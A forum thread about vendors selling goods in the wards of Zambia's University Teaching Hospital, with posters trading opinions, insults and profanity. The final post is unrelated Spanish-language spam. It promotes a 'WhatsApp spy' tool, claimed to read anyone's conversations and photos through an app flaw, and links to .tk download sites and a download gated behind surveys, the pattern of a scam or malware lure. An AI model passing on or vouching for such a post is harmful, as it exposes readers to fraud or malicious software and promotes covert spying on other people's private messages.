Vending in UTH

» Reply to this Letter   or   Write a new Letter to Zambia (start new topic)

Vending in UTH

Postby April » 4th April 2014, 12:41

Dear Zambia,

I dont know whether i saw things right at our highest referal hospital....i was confused i didnt know whether it was a market or hospital people where selling all sort of things in the wards ....oh dear....is there order left in Zambia i wonder?
April

Re: Vending in UTH

Postby mr zambia » 4th April 2014, 13:00

You seem to forget zambia is an african state a third world country indeed for sure.
mr zambia

Postby Foloko » 4th April 2014, 16:48

April,

I have not been to UTH in many years now. Although I believe you because you are April. I wonder what the sign at the gate of UTH says these days. If they have not already changed it, it should say THE ZOO. That will put everything that goes on there in a nutshell.
Foloko

Postby Foloko » 4th April 2014, 17:27

April,

Hold it right there. Please just hold it!

When I read your post the first time, I somehow missed three words. in the wards. You are shitting me, right? I thought it was bad enough but I was thinking this madness goes on outside the buildings!
Foloko

Postby Slumdog shalapungu » 4th April 2014, 20:09

Some of the complaints you chaps make, totally useless. Go to any hospital in the world you will find commerce going on because there is demand for goods.You go to any european hospital you will find starbucks, subways and even chaps selling phone and tv credit to patients , granted its not vending but its commerce nonetheless. Those patients in hospital need snacks, fizzy drinks, bubble gum, cream donads(i know its doughnut chimbwe iwe). If you have your blulu bed ridden and sick you think he wants to sit there all day eating UTH food which is cooked by some worker with chifukushi issues? Let people be and let people trade and contribute to the economy , I know damn well if I am ever stuck at UTH i am not eating UTH food I will be buying those damn sweet tobamutwe's and freezits to keep my glucose level up and help some chap feed his family
Slumdog shalapungu

Postby Bongololo » 4th April 2014, 20:38

buti ka slumbitch and your childish argumentative bullshit. In the same breath you accuse others of complaining about trivial things and then you turn around and accuse UTH as such a disaster zone that you would never dream of eating their food.

So you actually agree with the indictment on UTH but you just want to argue because you are an ass hole.
Bongololo

Postby nomba ninshi » 5th April 2014, 14:06

kugulisa makwebo mufipatala sitilesa, manje kagulise!
nomba ninshi

Postby mr zambia » 5th April 2014, 20:14

Like I said before zambia is a third world country what do you expect .
mr zambia

Postby mr zambia » 6th April 2014, 21:22

I don't know it there are such terms as fourth world and fifth world countries but if there are zambia will be such. A fifth world country.
mr zambia

Postby Bird » 7th April 2014, 13:05

Again, when you see a post, any post regardless of ID, with layers upon layers of an innate stupidity, chances are that Slumdog authored it. Typical of Slumimbwa. I'm also serious :-))
Bird

Whatsapp spy 2014, espia a tus contactos hackers

Postby Lorenavilanozsa » 9th April 2014, 02:49

Hola como estan , les traigo para que descarguen el whatsapp spy , es un programa que se conecta a un fallo que actualmente tiene whatsapp y puedes ver las conversaciones y fotos de las personas que quieras.
es muy facil de usar , tiene una ventana en la que debes poner el codigo del pais osea si es mexico pones +52 y luego el numero de telefono por ejemplo 5045698456, luego le ponen submitir , luego a conect, esperas unos segundos y se conecta y podras comenzar a descargar las conversaciones
(ACLARACION, EL MOBIL AL QUE QUIERES CONECTARTE TIENE QUE ESTAR SI O SI CONECTADO A WHATSAPP , EN ESE MOMENTO NO ESTA TE DARA ERROR)
La pagina del fabricante es : [url]http://www.spywhatsappfree.tk[/url] o [url]http://www.whatsappsspy2014.tk[/url]
Bueno, la direccion de descarga es :

[url]http://sharkyfiles.com/w1g0WuS9jK[/url]
(Recuerda para poder descargar debes completar alguna de las encuestas que te figuran en la pagina con tu celular)

TAMBIEN LES DEJO UN VIDEO PARA QUE VEAN COMO FUNCIONA:
link: [url]http://www.dailymotion.com/video/x1l6va7_whatsapp-spy-tested-2014_tech[/url]
esta muy bueno disfrutenlo, Saludos
Lorenavilanozsa

Return to Hospitality (Hotels, lodges, motels, bush camps, etc.)